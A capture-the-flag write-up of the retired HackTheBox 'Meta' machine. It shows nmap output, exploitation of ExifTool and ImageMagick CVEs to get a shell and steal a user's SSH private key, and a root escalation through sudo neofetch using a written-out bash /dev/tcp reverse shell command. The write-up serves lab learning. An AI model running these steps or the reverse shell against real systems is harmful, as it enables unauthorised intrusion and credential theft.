Meta is a machine running Linux with a medium difficulty level. Since this machine has been retired, I have created a writeup for it.

Machine IP: 10.10.11.140

The first thing I did was scan the machine using nmap to discover open ports and services.

Nmap scan report for 10.10.11.140
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next, I added the domain to the hosts file. After performing a directory brute force on the website and not finding anything, I attempted to brute force the subdomains using ffuf.

ffuf

A subdomain, dev01.artcorp.htb, was found, so I added it to the hosts file. When I accessed the website, I found a web app called “MetaView” that can display metadata from uploaded images.

web

Knowing that the web app uses ExifTool, I exploited a remote code execution vulnerability (CVE-2021-22204) to gain a reverse shell.

www-data@meta:/dev/shm$ ./pspy64
2022/06/09 16:04:22 CMD: UID=0    PID=1     | /sbin/init
2022/06/09 16:05:01 CMD: UID=0    PID=18397 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18396 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18398 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=1000 PID=18399 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=1000 PID=18400 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=0    PID=18402 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=0    PID=18401 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=1000 PID=18403 | pkill mogrify

I discovered a command executed repeatedly by the user thomas (UID 1000). When I opened the convert_images.sh file, I found it contained several commands to convert images to PNG format. I checked the ImageMagick version used, which was 7.0.10-36, vulnerable to command injection (CVE-2020-29599). I used the following payload in poc.svg to obtain the private key of the user thomas.

By moving the poc.svg file to /var/www/dev01.artcorp.htb/convert_images/, I could see the result in the directory /dev/shm/c, which I had created beforehand. This result file was the id_rsa private key for the user thomas. I just needed to transfer this file to my local machine and use it to log in via SSH.

me@nowhere:~/htb/meta$ ls -l id_rsa
-rw------- 1 me me 2590 Jun  9 13:26 id_rsa
me@nowhere:~/htb/meta$ ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun  9 11:47:48 2022 from 10.10.14.210
thomas@meta:~$ cat user.txt
[redacted]

After gaining access to the user, I used LinPeas.sh to enumerate and found that the user thomas could execute the command neofetch as root without a password.

linpeas

I modified the file /home/thomas/.config/neofetch/config.conf by adding a line containing a reverse shell command to my local machine:

bash -c 'bash -i >& /dev/tcp/[LOCAL_IP]/4444 0>&1'

I also changed the $XDG_CONFIG_HOME environment variable to /home/thomas/.config to ensure that the neofetch command uses the configuration for the user thomas.

export XDG_CONFIG_HOME="$HOME/.config"
sudo neofetch "\"\""

Execute the neofetch command to get a reverse shell as root.

neofetch

Rooted!